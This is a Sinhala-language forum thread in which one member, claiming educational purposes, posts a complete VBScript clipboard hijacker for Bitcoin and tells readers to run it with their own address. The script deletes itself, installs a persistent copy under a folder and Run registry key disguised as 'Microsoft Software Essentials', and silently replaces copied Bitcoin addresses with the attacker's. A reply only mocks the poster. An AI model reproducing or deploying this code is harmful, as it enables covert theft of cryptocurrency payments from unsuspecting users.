BitCoin Hack කරමු

emawot

Junior member
  • Dec 28, 2014
    76
    18
    18
    ඔන්න මේක දැම්මෙ Education Purpose Only.මම වලට අලුත් ඉතින් බිට්කොයින් ෆ්‍රී ගන්න සයිට් හොය හොය ඉන්නකොට තමයි මේක හම්බ උනේ.කොහොම හරි මොකක් හරි සයිට් එකකින් මගෙ පිසී එකට trojan එකක් බැවිලා. මන් මගේ BitCoin Address එක කොපි කලාම එකෙන් වෙන්නේ Clipboard එකේ තියෙන Address එක වෙනස් වෙනවා වෙන BitCoin Address එකකට එතකොට පෙස්ට් වෙන්නේ වෙන කෙනෙක්ගෙ එකක්.

    මගෙ එක :16Z5yGFhiNVAb5H2Ro44Qm8AKXaX7wUPLA

    ඕක මට Copy කරන්න බැහැ Copy කලහම Paste වෙන්නේ 16Z5yGFhiNVAb5H2Ro44Qm8AKXaX7wUPLA කියල එකක්.

    බලන්නකො එයාගේ Transactions >> https://blockchain.info/address/13ywdpLJ9iEA93BtCwez2w8zXFPWxoDota

    කොහොම හරි ඉතිම් මට trojan එක හොයාගන්න බැරි උනා එක Task Manager පෙන්නනේත් නෑ .Task Manager Open වෙන්නෙත් නැ.:confused:


    ඉතින් මන් කලේ .VBS එකක් හදල අයේ අයේ එකෙ තියෙන Address එක මගේ BitCoin Address එකටම වෙනස් වෙන්න හදපු එක.

    Code:
    Set objWSH = CreateObject("WScript.Shell")
    Set objFSO = CreateObject("Scripting.FileSystemObject")
    objFSO.DeleteFile(wscript.ScriptFullName)
    On Error Resume Next
    
    MyBTCAddress = "16Z5yGFhiNVAb5H2Ro44Qm8AKXaX7wUPLA "
    
    BTCFolder = objWSH.ExpandEnvironmentStrings("%PROGRAMDATA%") & "\Microsoft Essentials"
    BTC = BTCFolder & "\Software Essentials.vbs"
    RegKeyName = "Microsoft Software Essentials"
    
    If Not objFSO.Folderexists(BTCFolder) then
    objFSO.CreateFolder BTCFolder
    End If
    Const HKEY_CURRENT_USER = &H80000001
    strComputer = "."
    Set objRegistry = GetObject("winmgmts:\\" & strComputer & "\root\default:StdRegProv")
    objRegistry.SetStringValue HKEY_CURRENT_USER, "Software\Microsoft\Windows\CurrentVersion\Run", RegKeyName, chr(34) & BTC & chr(34)
    
    Sub CreateBTCs
        Set FileBTC = objFSO.CreateTextFile(BTC, True)
        FileBTC.WriteLine "On Error Resume Next"
        FileBTC.WriteLine "Set objHTML = CreateObject(" & chr(34) & "HTMLfile" & chr(34) & ")"
        FileBTC.WriteLine "Set objWSH = CreateObject(" & chr(34) & "WScript.Shell" & chr(34) & ")"
        FileBTC.WriteLine "Do"
        FileBTC.WriteLine "wscript.sleep(500)"
        FileBTC.WriteLine "Clipboard = objHTML.ParentWindow.ClipboardData.GetData(" & chr(34) & "text" & chr(34) & ")"
        FileBTC.WriteLine "LengthofClipboard = Len(Clipboard)"
        FileBTC.WriteLine "If Left(Clipboard,1) = " & chr(34) & "1" & chr(34) & " then"
        FileBTC.WriteLine "If LengthofClipboard >= 26 and LengthofClipboard <= 35 then"
        FileBTC.WriteLine "objWSH.run " & chr(34) & "C:\Windows\System32\cmd.exe /c echo " & MyBTCAddress & "| clip" & chr(34) & ", 0"
        FileBTC.WriteLine "End If"
        FileBTC.WriteLine "End If"
        FileBTC.WriteLine "If Left(Clipboard,1) = " & chr(34) & "3" & chr(34) & " then"
        FileBTC.WriteLine "If LengthofClipboard >= 26 and LengthofClipboard <= 35 then"
        FileBTC.WriteLine "objWSH.run " & chr(34) & "C:\Windows\System32\cmd.exe /c echo " & MyBTCAddress & "| clip" & chr(34) & ", 0"
        FileBTC.WriteLine "End If"
        FileBTC.WriteLine "End If"
        FileBTC.WriteLine "Loop"
        FileBTC.Close
    End Sub
    
    CreateBTCs
    
    objWSH.run chr(34) & BTC & chr(34)

    ඔය කොඩ් එක .vbs විදියට Save කරල Run කරල බලන්න.

    MyBTCAddress එකට ඔයාලගේ එක දේන්න.ඔය එක යාලුවන්ගේ PC වලට එහෙම දාන්නව නෙමෙයි ඔන්න.

    ඕකෙන් වෙනස් වෙන්නේ මුල අකුර 1 හො 3 තියෙන 256 කින් යුක්ත ඒවා විතරයි අනිත් Copy කරන හැම එකක්ම වෙනස් වෙන්නෙ නැ..
     

    sp3co

    Well-known member
  • Sep 22, 2016
    1,495
    425
    83
    Katubedda
    ...
    මගෙ එක :16Z5yGFhiNVAb5H2Ro44Qm8AKXaX7wUPLA

    ඕක මට Copy කරන්න බැහැ Copy කලහම Paste වෙන්නේ 16Z5yGFhiNVAb5H2Ro44Qm8AKXaX7wUPLA කියල එකක්....

    .

    ithin oya dekama ekai ne ban (copy karana ekama ne paste wenneth :P ) :shocked:

    + oya script eken ithin monada wenne ? :lol: